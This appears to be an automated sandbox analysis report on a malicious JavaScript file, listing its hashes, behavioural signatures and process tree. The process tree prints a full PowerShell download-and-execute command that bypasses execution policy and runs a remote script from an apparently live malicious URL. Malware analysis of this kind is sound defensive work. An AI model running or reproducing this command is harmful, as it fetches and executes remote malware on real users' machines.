Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:49
Static task
static1
Behavioral task
behavioral1
Sample
da13cd92728c03754d8d81783946bc936d078669af24cbe4133f72c0ae14e2ae.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
da13cd92728c03754d8d81783946bc936d078669af24cbe4133f72c0ae14e2ae.js
Resource
win10v2004-20240226-en
General
-
Target
da13cd92728c03754d8d81783946bc936d078669af24cbe4133f72c0ae14e2ae.js
-
Size
69KB
-
MD5
03c05690015beed115f741bbdec26e7f
-
SHA1
c2302e2f4bbfacaf4bb58d20d57f05c85ac73fc9
-
SHA256
da13cd92728c03754d8d81783946bc936d078669af24cbe4133f72c0ae14e2ae
-
SHA512
ec8703385e064eb9f16ef531859799fc580d21bdb4ba40ef5a3beb0f6366efb040880aeb7ed94c078db3dfd0218ffa250aea2626996ea1dfd37d61054ef3865f
-
SSDEEP
1536:YP6Y/yqieroJXPA/FNAu5nVg0lq52A/U5oZtytEMwGOM6Sl8Ppx:e6Yqq/oJ/EzzY2A/CozUEMPOM6Slkx
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1700 powershell.exe 4 1700 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1700 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2352 wrote to memory of 1700 2352 wscript.exe 28 PID 2352 wrote to memory of 1700 2352 wscript.exe 28 PID 2352 wrote to memory of 1700 2352 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\da13cd92728c03754d8d81783946bc936d078669af24cbe4133f72c0ae14e2ae.js1⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-